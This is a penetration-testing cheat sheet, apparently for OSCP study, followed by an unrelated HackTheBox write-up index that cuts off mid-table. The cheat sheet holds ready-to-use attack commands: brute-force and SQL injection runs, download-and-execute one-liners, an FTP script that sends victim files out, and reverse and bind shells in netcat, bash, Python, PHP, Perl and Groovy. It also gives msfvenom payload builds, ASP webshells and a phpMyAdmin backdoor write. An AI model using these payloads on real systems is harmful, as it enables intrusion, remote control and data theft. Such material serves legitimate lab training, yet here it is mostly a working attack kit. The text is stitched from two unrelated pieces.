[TFTP](#tftp) + [Start TFTP Daemon (Folder /var/tftp)](#start-tftp-daemon--folder--var-tftp-) + [Transfer Files](#transfer-files) * [VBScript](#vbscript) + [Create wget.vbs File](#create-wgetvbs-file) + [Download Files](#download-files) - [Shells](#shells) * [Upgrade Your Shell (TTY Shell)](#upgrade-your-shell--tty-shell-) * [Enable Tab-Completion](#enable-tab-completion) * [Catching Reverse Shells (Netcat)](#catching-reverse-shells--netcat-) * [Netcat](#netcat-1) + [Reverse Shell](#reverse-shell) - [Unix](#unix) - [Windows](#windows) + [Bind shell](#bind-shell) - [Unix](#unix-1) - [Windows](#windows-1) * [Bash](#bash) + [Reverse Shell](#reverse-shell-1) * [Python](#python) + [As Command (Reverse Shell)](#as-command--reverse-shell-) + [Python Code (Reverse Shell)](#python-code--reverse-shell-) * [PHP](#php) + [Kali Default PHP Reverse Shell](#kali-default-php-reverse-shell) + [Kali Default PHP CMD Shell](#kali-default-php-cmd-shell) + [PHP Reverse Shell](#php-reverse-shell) + [CMD Shell](#cmd-shell) + [WhiteWinterWolf Webshell](#whitewinterwolf-webshell) * [MSFVENOM](#msfvenom) + [Windows Binary (.exe)](#windows-binary--exe-) - [32 Bit (x86)](#32-bit--x86-) - [64 Bit (x64)](#64-bit--x64-) + [Linux Binary (.elf)](#linux-binary--elf-) - [32 Bit (x86)](#32-bit--x86--1) - [64 Bit (x64)](#64-bit--x64--1) + [Java Server Pages (.jsp)](#java-server-pages--jsp-) + [Active Sever Pages Extended (.aspx)](#active-sever-pages-extended--aspx-) * [Active Sever Pages Extended (.aspx)](#active-sever-pages-extended--aspx--1) + [Transfer A File (Certutil)](#transfer-a-file--certutil-) + [Execute a File](#execute-a-file) * [Jenkins / Groovy (Java)](#jenkins---groovy--java-) + [Linux Reverse Shell](#linux-reverse-shell) + [Windows Reverse Shell](#windows-reverse-shell) * [Perl](#perl) + [Reverse Shell](#reverse-shell-2) * [PhpmyAdmin](#phpmyadmin) *** # Reconnaissance ## Autorecon https://github.com/Tib3rius/AutoRecon ```bash autorecon -vv 192.168.0.1 ``` *** ## Nmap ### Initial Fast TCP Scan ```bash nmap -v -sS -sV -Pn --top-ports 1000 -oA initial_scan_192.168.0.1 192.168.0.1 ``` ### Full TCP Scan ```bash nmap -v -sS -Pn -sV -p 0-65535 -oA full_scan_192.168.0.1 192.168.0.1 ``` ### Limited Full TCP Scan *If the syn scan is taking very long to complete, the following command is an alternative (no service detection).* ```bash nmap -sT -p- --min-rate 5000 --max-retries 1 192.168.0.1 ``` ### Top 100 UDP Scan ```bash nmap -v -sU -T4 -Pn --top-ports 100 -oA top_100_UDP_192.168.0.1 192.168.0.1 ``` ### Full Vulnerability scan ```bash nmap -v -sS -Pn --script vuln --script-args=unsafe=1 -oA full_vuln_scan_192.168.0.1 192.168.0.1 ``` ### Vulners Vulnerability Script ```bash nmap -v -sS -Pn --script nmap-vulners -oA full_vuln_scan_192.168.0.1 192.168.0.1 ``` ### SMB Vulnerabitlity Scan ```bash nmap -v -sS -p 445,139 -Pn --script smb-vuln* --script-args=unsafe=1 -oA smb_vuln_scan_192.168.0.1 192.168.0.1 ``` *** ## Gobuster ### HTTP #### Fast Scan (Small List) ```bash gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirb/big.txt -t 20 ``` #### Fast Scan (Big List) ```bash gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 ``` #### Slow Scan (Check File Extensions) ```bash gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,cgi,sh,bak,aspx -t 20 ``` ### HTTPS *Set the `--insecuressl` flag.* *** ## SMBCLIENT To fix `NT_STATUS_CONNECTION_DISCONNECTED` errors in new Kali installations add `client min protocol = NT1` to your `\etc\samba\smb.conf` file. ### List Shares (As Guest) ```bash smbclient -U guest -L 192.168.0.1 ``` ### Connect to A Share (As User John) ```bash smbclient \\\\192.168.0.1\\Users -U c.smith ``` ### Download All Files From A Directory Recursively ```bash smbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd 'path\to\directory\';lcd '~/path/to/download/to/';mget *' example: smbclient \\\\192.168.0.1\\Data -U John -c 'prompt OFF;recurse ON;cd '\Users\John\';lcd '/tmp/John';mget *' ``` ### Alternate File Streams #### List Streams ```bash smbclient \\\\192.168.0.1\\Data -U John -c 'allinfo "\Users\John\file.txt"' ``` #### Download Stream By Name (:SECRET) ```bash smbclient \\\\192.168.0.1\\Data -U John get "\Users\John\file.txt:SECRET:$DATA" ``` *** ## Enum4Linux ### Scan Host ```bash enum4linux 192.168.0.1 ``` ### Scan Host, Suppress Errors ```bash enum4linux 192.168.0.1 | grep -Ev '^(Use of)' > enum4linux.out ``` *** ## NFS ### Show mountable drives ```bash showmount -e 192.168.0.1 ``` ### Mount Drive ```bash mkdir mpt mount -t nfs -o soft 192.168.0.1:/backup mpt/ ``` *** ## WebApp Paths https://github.com/pwnwiki/webappdefaultsdb/blob/master/README.md *** ## SQLMAP **DISCLAIMER: There are a number of tools you are not allowed to use in your OSCP exam. At the time of writing, sqlmap is one of them. Check which tools are restricted/banned before you use them during your exam. You can find detailed information about tool usage in the exam guidelines.** ### Get Request ### Test All (Default Settings) ```bash sqlmap -u "http://192.168.0.1/database/inject.php?q=user" --batch ``` #### Test All (Default Settings, High Stress) ```bash sqlmap -u "http://192.168.0.1/database/inject.php?q=user" --batch --level=5 --risk=3 ``` ### Post Request (Capture with BURP) #### Test All (Default Settings) ```bash sqlmap --all -r post_request.txt --batch ``` #### Test All (Default Settings, High Stress) ```bash sqlmap --all -r post_request.txt --batch --level=5 --risk=3 ``` #### Get A Reverse Shell (MySQL) ```bash sqlmap -r post_request.txt --dbms "mysql" --os-shell ``` *** # Brute Force ## Hydra ### HTTP Basic Authentication ```bash hydra -l admin -V -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.0.1 http-get /phpmyadmin/ -t 15 ``` ### HTTP Get Request ```bash hydra 192.168.0.1 -V -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t 15 ``` ### HTTP Post Request Check request in BURP to see Post parameters. **-l or -L has to be set, even if there is no user to login with!**. Use `https-post-form` instead of `http-post-form` for HTTPS sites. ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t 15 ``` ### MYSQL *Change MYDATABASENAME. Default databasename is mysql.* ```bash hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -vv mysql://192.168.0.1:3306/MYDATABASENAME -t 15 ``` *** # File Transfer ## Powershell ### As Cmd.exe Command ```bash powershell -ExecutionPolicy bypass -noprofile -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.1:80/winprivesc/JuicyPotato.exe','C:\Users\john\Desktop\juicy.exe') ``` ### Encode Command for Transfer *Very helpful for chars that need to be escaped otherwise.* ```bash $Command = '(new-object System.Net.WebClient).DownloadFile("http://192.168.0.1:80/ftp.txt","C:\Windows\temp\ftp.txt")' $Encoded = [convert]::ToBase64String([System.Text.encoding]::Unicode.GetBytes($command)) powershell.exe -NoProfile -encoded $Encoded ``` *** ## Certutil ### Download ```bash certutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe ``` ### Download & Execute Python Command ```bash os.execute('cmd.exe /c certutil.exe -urlcache -split -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe & C:\Windows\Temp\shell.exe') ``` *** ## SMB ### Start Impacket SMB Server (With SMB2 Support) ```bash impacket-smbserver -smb2support server_name /var/www/html ``` ### List Drives (Execute on Victim) ```bash net view \\192.168.0.1 ``` ### Copy Files (Execute on Victim) ```bash copy \\192.168.0.1\server_name\shell.exe shell.exe ``` *** ## PureFTP ### Install ```bash apt-get update && apt-get install pure-ftpd ``` ### Create setupftp.sh Execute The Script ```bash #!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd myftpuser -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ sudo ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/40PureDBexit mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart ``` ```bash ./setupftp.sh ``` ### Get Service Ready #### Reset Password ```bash pure-pw passwd offsec -f /etc/pure-ftpd/pureftpd.passwd ``` #### Commit Changes ```bash pure-pw mkdb ``` #### Restart Service ```bash /etc/init.d/pure-ftpd restart ``` ### Create FTP Script (On Victim) ```bash echo open 192.168.0.1>> ftp.txt echo USER myftpuser>> ftp.txt echo mypassword>> ftp.txt echo bin>> ftp.txt echo put secret_data.txt>> ftp.txt echo bye >> ftp.txt ``` ### Exectue Script (on Victim) ```bash ftp -v -n -s:ftp.txt ``` *** ## Netcat ## Receiving Shell ```bash nc -l -p 1234 > out.file ``` ## Sending Shell ```bash nc -w 3 192.168.0.1 1234 < out.file ``` *** ## TFTP ### Start TFTP Daemon (Folder /var/tftp) ```bash atftpd --daemon --port 69 /var/tftp ``` ### Transfer Files ```bash tftp -i 192.168.0.1 GET whoami.exe ``` *** ## VBScript ### Create wget.vbs File ```bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs ``` ### Download Files ```bash cscript wget.vbs http://192.168.0.1/nc.exe nc.exe ``` *** # Shells *** ## Upgrade Your Shell (TTY Shell) ```bash python -c 'import pty;pty.spawn("/bin/bash");' ``` *** ## Enable Tab-Completion 1. In your active shell press `bg` to send your nc session to background 2. Enter `stty raw -echo` 3. Enter `fg` to bring your nc session to foreground 4. Enter `export TERM=xterm-256color` *** ## Catching Reverse Shells (Netcat) *rlwrap enables the usage of arrow keys in your shell.* https://github.com/hanslub42/rlwrap ```bash rlwrap nc -nlvp 4444 ``` *** ## Netcat ### Reverse Shell #### Unix *Victim:* ```bash nc 192.168.0.1 4444 -e /bin/bash ``` *If `-e` is not allowed, try to find other versions of netcat* ```bash /bin/nc /usr/bin/ncat /bin/netcat /bin/nc.traditional ``` *Attacker:* ```bash rlwrap nc -nlvp 4444 ``` #### Windows ```bash nc 192.168.0.1 4444 -e cmd.exe ``` ### Bind shell #### Unix *Victim:* ```bash nc -nlvp 4444 -e /bin/bash ``` *Attacker:* ```bash nc 192.168.0.1 4444 ``` #### Windows *Victim:* ```bash nc -nlvp 4444 -e cmd.exe ``` *Attacker:* ```bash nc 192.168.0.1 4444 ``` *** ## Bash ### Reverse Shell ```bash /bin/bash -i >& /dev/tcp/192.168.0.1/4433 0>&1 ``` *** ## Python ### As Command (Reverse Shell) ```bash python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ### Python Code (Reverse Shell) ```python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.0.1",4444));os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) ``` *** ## PHP ### Kali Default PHP Reverse Shell ```bash cat /usr/share/webshells/php/php-reverse-shell.php ``` ### Kali Default PHP CMD Shell ```bash cat /usr/share/webshells/php/php-backdoor.php ``` ### PHP Reverse Shell *Version 1:* ```bash <?php echo shell_exec("/bin/bash -i >& /dev/tcp/192.168.0.1/4444 0>&1");?> ``` *Version 2:* ```bash <?php $sock=fsockopen("192.168.0.1", 4444);exec("/bin/sh -i <&3 >&3 2 >& 3");?> ``` *As Command:* ```bash php -r '$sock=fsockopen("192.168.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");' ``` ### CMD Shell ```bash <?php echo system($_REQUEST["cmd"]); ?> ``` *Call the CMD shell:* ```bash http://192.168.0.1/cmd_shell.php?cmd=whoami ``` ### WhiteWinterWolf Webshell https://github.com/WhiteWinterWolf/wwwolf-php-webshell *** ## MSFVENOM ### Windows Binary (.exe) #### 32 Bit (x86) *Reverse Shell:* ```bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe ``` *Bind Shell:* ```bash msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe ``` *Output in Hex, C Style, Exclude bad chars, Exitfunction thread:* ```bash msfvenom -p windows/shell_bind_tcp LHOST=192.168.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows ``` #### 64 Bit (x64) *Reverse Shell:* ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe ``` *Bind Shell:* ```bash msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe ``` *Meterpreter:* ```bash msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe ``` ### Linux Binary (.elf) #### 32 Bit (x86) *Reverse Shell:* ```bash msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elf ``` *Bind Shell:* ```bash msfvenom -p linux/x86/shell/bind_tcp LHOST=192.168.0.1 -f elf > bind_shell.elf ``` #### 64 Bit (x64) *Reverse Shell:* ```bash msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elf ``` *Bind Shell:* ```bash msfvenom -p linux/x64/shell/bind_tcp LHOST=192.168.0.1 -f elf > rev_shell.elf ``` ### Java Server Pages (.jsp) ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST192.168.0.1 LPORT=4444 -f raw > shell.jsp ``` *As .war:* ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f war -o shell.war ``` ### Active Sever Pages Extended (.aspx) ```bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f aspx -o rev_shell.aspx ``` *** ## Active Sever Pages Extended (.aspx) ### Transfer A File (Certutil) ```bash <% Set rs = CreateObject("WScript.Shell") Set cmd = rs.Exec("cmd /c certutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe") o = cmd.StdOut.Readall() Response.write(o) %> ``` ### Execute a File ```bash <% Set rs = CreateObject("WScript.Shell") Set cmd = rs.Exec("cmd /c C:\Windows\Temp\shell.exe") o = cmd.StdOut.Readall() Response.write(o) %> ``` *** ## Jenkins / Groovy (Java) ### Linux Reverse Shell ```Java String host="192.168.0.1"; int port=4444; String cmd="/bin/sh"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` ### Windows Reverse Shell ```Java String host="192.168.0.1"; int port=4444; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` *** ## Perl ### Reverse Shell ```perl perl -MIO -e 'use Socket;$ip="192.168.0.1";$port=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` *** ## PhpmyAdmin Write a CMD shell into a file with the right permissions. Issue the following select. (Try different paths for different webservers) *Windows:* ```sql SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php" ``` *Unix:* ```sql SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php" ``` ***
# HackTheBox CTF Cheatsheet This cheatsheet is aimed at CTF players and beginners to help them sort Hack The Box Labs on the basis of operating system and difficulty. This list contains all the Hack The Box writeups available on hackingarticles. We have performed and compiled this list based on our experience. Please share this with your connections and direct queries and feedback to [Hacking Articles](https://twitter.com/hackinarticles). [1.5]: https://raw.githubusercontent.com/Ignitetechnologies/Windows-Privilege-Escalation/main/linked.png [1.6]: https://www.linkedin.com/company/hackingarticles/ [1.3]: https://raw.githubusercontent.com/Ignitetechnologies/Windows-Privilege-Escalation/main/discord.png [1.4]: https://discord.com/invite/kyKvXwK4Bk [1.1]: https://raw.githubusercontent.com/Ignitetechnologies/Windows-Privilege-Escalation/main/twitter.png [1]: http://www.twitter.com/hackinarticles # Follow us on [![alt text][1.1]][1] [![alt text][1.3]][1.4] [![alt text][1.5]][1.6] ![image](https://github.com/Ignitetechnologies/HackTheBox-CTF-Writeups/blob/master/htb.png?raw=true) | No. | Machine Name | Operating System | Difficulty | |-----|--------------|------------------|------------------| | 1. | [Access](https://www.hackingarticles.in/hack-the-box-access-walkthrough/)|Windows|Easy| | 2. | [Active](https://www.hackingarticles.in/hack-the-box-active-walkthrough/)|Windows|Easy| | 3. | [Apocalyst](https://www.hackingarticles.in/hack-the-box-challenge-apocalyst-walkthrough/)|Linux|Medium| | 4. | [Aragog](https://www.hackingarticles.in/hack-the-box-aragog-walkthrough/)|Linux|Medium| | 5. | [Arctic](https://www.hackingarticles.in/hack-the-box-challenge-arctic-walkthrough/)|Windows|Easy| | 6. | [Ariekei](https://www.hackingarticles.in/hack-the-box-challenge-ariekei-walkthrough/)|Linux|Insane| | 7. | [Bank](https://www.hackingarticles.in/hack-the-box-challenge-bank-walkthrough/)|Linux|Easy| | 8. | [Bart](https://www.hackingarticles.in/hack-the-box-bart-walkthrough/)|Windows|Medium| | 9. | [Bashed](https://www.hackingarticles.in/hack-the-box-challenge-bashed-walkthrough/)|Linux|Easy| | 10. | [Beep](https://www.hackingarticles.in/hack-the-box-challenge-beep-walkthrough/)|Linux|Easy| | 11. | [Blocky](https://www.hackingarticles.in/hack-the-box-challenge-blocky-walkthrough/)|Linux|Easy| | 12. | [Blue](https://www.hackingarticles.in/hack-the-box-challenge-blue-walkthrough/)|Windows|Easy| | 13. | [Bounty](https://www.hackingarticles.in/hack-the-box-bounty-walkthrough/)|Windows|Easy| | 14. | [Brainfuck](https://www.hackingarticles.in/hack-the-box-challenge-brainfuck-walkthrough/)|Linux|Insane| | 15. | [Calamity](https://www.hackingarticles.in/hack-the-box-challenge-calamity-walkthrough/)|Linux|Hard| | 16. | [Canape](https://www.hackingarticles.in/hack-the-box-challenge-canape-walkthrough/)|Linux|Medium| | 17. | [Carrier](https://www.hackingarticles.in/hack-the-box-carrier-walkthrough/)|Linux|Medium| | 18. | [Celestial](https://www.hackingarticles.in/hack-the-box-celestial-walkthrough/)|Linux|Medium| | 19. | [Charon](https://www.hackingarticles.in/hack-the-box-challenge-charon-walkthrough/)|Linux|Hard| | 20. | [Chatterbox](https://www.hackingarticles.in/hack-the-box-challenge-chatterbox-walkthrough/)|Windows|Medium| | 21. | [Crimestoppers](https://www.hackingarticles.in/hack-the-box-challenge-crimestoppers-walkthrough/)|Windows|Hard| | 22. | [Cronos](https://www.hackingarticles.in/hack-the-box-challenge-cronos-walkthrough/)|Linux|Hard| | 23. | [Curling](https://www.hackingarticles.in/hack-the-box-curling-walkthrough/)|Linux|Easy| | 24. | [Dab](https://www.hackingarticles.in/hack-the-box-dab-walkthrough/)|Linux|Hard| | 25. | [Devel](https://www.hackingarticles.in/hack-the-box-challenge-devel-walkthrough/)|Windows|Easy| | 26. | [DevOops](https://www.hackingarticles.in/hack-the-box-devoops-walkthrough/)|Linux|Medium| | 27. | [Dropzone](https://www.hackingarticles.in/hack-the-box-dropzone-walkthrough/)|Windows|Hard| | 28. | [Enterprise](https://www.hackingarticles.in/hack-the-box-challenge-enterprises-walkthrough/)|Linux|Medium| | 29. | [Europa](https://www.hackingarticles.in/hack-the-box-challenge-europa-walkthrough/)|Linux|Medium| | 30. | [Falafel](https://www.hackingarticles.in/hack-the-box-challenge-falafel-walkthrough/)|Linux|Hard| | 31. | [Fighter](https://www.hackingarticles.in/hack-the-box-fighter-walkthrough/)|Windows|Insane| | 32. | [Fluxcapacitor](https://www.hackingarticles.in/hack-the-box-challenge-fluxcapacitor-walkthrough/)|Linux|Medium| | 33. | [FriendZone](https://www.hackingarticles.in/hack-the-box-friendzone-walkthrough/)|Linux|Easy| | 34. | [Frolic](https://www.hackingarticles.in/hack-the-box-frolic-walkthrough/)|Linux|Easy| | 35. | [Fulcurm](https://www.hackingarticles.in/hack-the-box-fulcrum-walkthrough/)|Linux|Easy| | 36. | [Giddy](https://www.hackingarticles.in/hack-the-box-giddy-walkthrough/)|Windows|Medium| | 37. | [Grandpa](https://www.hackingarticles.in/hack-the-box-challenge-grandpa-walkthrough/)|Windows|Easy| | 38. | [Granny](https://www.hackingarticles.in/hack-the-box-challenge-granny-walkthrough/)|Windows|Easy| | 39. | [Haircut](https://www.hackingarticles.in/hack-the-box-challenge-haircut-walkthrough/)|Linux|Medium| | 40. | [Hawk](https://www.hackingarticles.in/hack-the-box-hawk-walkthrough/)|Linux|Medium| | 41. | [Help](https://www.hackingarticles.in/hack-the-box-help-walkthrough/)|Linux|Easy| | 42. | [Holiday](https://www.hackingarticles.in/hack-the-box-holiday-walkthrough/)|Linux|Hard| | 43. | [Inception](https://www.hackingarticles.in/hack-the-box-challenge-inception-walkthrough/)|Linux|Medium| | 44. | [Irked](https://www.hackingarticles.in/hack-the-box-irked-walkthrough/)|Linux|Easy| | 45. | [Jail](https://www.hackingarticles.in/hack-the-box-challenge-jail-walkthrough/)|Linux|Insane| | 46. | [Jeeves](https://www.hackingarticles.in/hack-the-box-challenge-jeeves-walkthrough/)|Windows|Medium| | 47. | [Jerry](https://www.hackingarticles.in/hack-the-box-jerry-walkthrough/)|Windows|Easy| | 48. | [Joker](https://www.hackingarticles.in/hack-the-box-challenge-joker-walkthrough/)|Linux|Hard| | 49. | [Kotarak](https://www.hackingarticles.in/hack-the-box-challenge-kotarak-walkthrough/)|Linux|Hard| | 50. | [Lame](https://www.hackingarticles.in/hack-the-box-challenge-lame-walkthrough/)|Linux|Easy| | 51. | [Lazy](https://www.hackingarticles.in/hack-the-box-challenge-lazy-walkthrough/)|Linux|Medium| | 52. | [Legacy](https://www.hackingarticles.in/hack-the-box-challenge-legacy-walkthrough/)|Windows|Easy| | 53. | [Lightweight](https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/)|Linux|Medium| | 54. | [Mantis](https://www.hackingarticles.in/hack-the-box-challenge-mantis-walkthrough/)|Windows|Hard| | 55. | [Minion](https://www.hackingarticles.in/hack-the-box-minion-walkthrough/)|Windows|Insane| | 56. | [Mirai](https://www.hackingarticles.in/hack-the-box-challenge-mirai-walkthrough/)|Linux|Easy| | 57. | [Mischief](https://www.hackingarticles.in/hack-the-box-mischief-walkthrough/)|Linux|Insane| | 58. | [Netmon](https://www.hackingarticles.in/hack-the-box-netmon-walkthrough/)|Windows|Easy| | 59. | [Nibble](https://www.hackingarticles.in/hack-the-box-challenge-nibble-walkthrough/)|Linux|Easy| | 60. | [Nightmare](https://www.hackingarticles.in/hack-nightmare-vm-ctf-challenge/)|Linux|Insane| | 61. | [Nineveh](https://www.hackingarticles.in/hack-the-box-nineveh-walkthrough/)|Linux|Medium| | 62. | [Node](https://www.hackingarticles.in/hack-the-box-challenge-node-walkthrough/)|Linux|Medium| | 63. | [October](https://www.hackingarticles.in/hack-the-box-october-walkthrough/)|Linux|Medium| | 64. | [Olympus](https://www.hackingarticles.in/hack-the-box-olympus-walkthrough/)|Linux|Medium| | 65. | [Optimum](https://www.hackingarticles.in/hack-the-box-challenge-optimum-walkthrough/)|Windows|Easy| | 66. | [Poison](https://www.hackingarticles.in/hack-the-box-poison-walkthrough/)|FreeBSD|Medium| | 67. | [Popcorn](https://www.hackingarticles.in/hack-the-box-challenge-popcorn-walkthrough/)|Linux|Medium| | 68. | [SecNotes](https://www.hackingarticles.in/hack-the-box-secnotes-walkthrough/)|Windows|Medium| | 69. | [Sense](https://www.hackingarticles.in/hack-the-box-challenge-sense-walkthrough/)|FreeBSD|Easy| | 70. | [Shocker](https://www.hackingarticles.in/hack-the-box-challenge-shocker-walkthrough/)|Linux|Easy| | 71. | [Shrek](https://www.hackingarticles.in/hack-the-box-challenge-shrek-walkthrough/)|Linux|Hard| | 72. | [Silo](https://www.hackingarticles.in/hack-the-box-silo-walkthrough/)|Windows|Medium| | 73. | [Sneaky](https://www.hackingarticles.in/hack-the-box-challenge-sneaky-walkthrough/)|Linux|Medium| | 74. | [Solid State](https://www.hackingarticles.in/hack-the-box-challenge-solid-state-walkthrough/)|Linux|Medium| | 75. | [Stratosphere](https://www.hackingarticles.in/hack-the-box-stratospherewalkthrough/)|Linux|Medium| | 76. | [Sunday](https://www.hackingarticles.in/hack-the-box-sunday-walkthrough/)|Solaris|Easy| | 77. | [Tally](https://www.hackingarticles.in/hack-the-box-challenge-tally-walkthrough/)|Windows|Hard| | 78. | [TartarSauce](https://www.hackingarticles.in/hack-the-box-tartarsauce-walkthrough/)|Linux|Medium| | 79. | [Teacher](https://www.hackingarticles.in/hack-the-box-teacher-walkthrough/)|Linux|Easy| | 80. | [Tenten](https://www.hackingarticles.in/hack-the-box-challenge-tenten-walkthrough/)|Linux|Medium| | 81. | [Valentine](https://www.hackingarticles.in/hack-the-box-valentine-walkthrough/)|Linux|Easy| | 82. | [Vault](https://www.hackingarticles.in/hack-the-box-vault-walkthrough/)|Linux|Medium| | 83. | [Waldo](https://www.hackingarticles.in/hack-the-box-waldo-walkthrough/)|Linux|Medium| | 84. | [Ypuffy](https://www.hackingarticles.in/hack-the-box-ypuffy-walkthrough/)|Others|Medium| | 85. | [Zipper](https://www.hackingarticles.in/hack-the-box-zipper-walkthrough/)|Linux|Hard| | 86. | [Luke](https://www.hackingarticles.in/hack-the-box-luke-walkthrough/)|Linux|Easy| | 87. | [Bastion](https://www.hackingarticles.in/hack-the-box-challenge-bastion-walkthrough/)|Windows|Easy| | 88. | [Heist](https://www.hackingarticles.in/hack-the-box-heist-walkthrough/) | Windows | Medium | | 89. | [Bitlab](https://www.hackingarticles.in/hack-the-box-challenge-bitlab-walkthrough/) | Linux | Medium | | 90. | [Jarvis](https://www.hackingarticles.in/hack-the-box-jarvis-walkthrough/) | Linux | Medium | | 91. | [Writeup](https://www.hackingarticles.in/hack-the-box-writeup-walkthrough/) | Linux | Easy | | 92. | [Networked](https://www.hackingarticles.in/hack-the-box-networked-walkthrough/) | Linux | Medium | | 93. | [Haystack](https://www.hackingarticles.in/hack-the-box-haystack-walkthrough/) | Linux | Medium | | 94. | [Postman](https://www.hackingarticles.in/hack-the-box-postman-walkthrough/) | Linux | Easy | | 95. | [Wall](https://www.hackingarticles.in/hack-the-box-wall-walkthrough/)| Linux | Medium | | 96. | [Open Admin Box](https://www.hackingarticles.in/hack-the-box-open-admin-box-walkthrough/)| Linux | Easy | | 97. | [Monteverde](https://www.hackingarticles.in/hack-the-box-monteverde-walkthrough/)| Windows | Medium | | 98. | [Sauna](https://www.hackingarticles.in/hackthebox-sauna-walkthrough/)| Windows | Easy | | 99. | [Conceal](https://www.hackingarticles.in/conceal-hackthebox-walkthrough/)| Windows | Hard | | 100. | [Tabby](https://www.hackingarticles.in/tabby-hackthebox-walkthrough/)| Linux | Easy | | 101. | [Omni](https://www.hackingarticles.in/omni-hackthebox-walkthrough/)| Windows | Easy | | 102. | 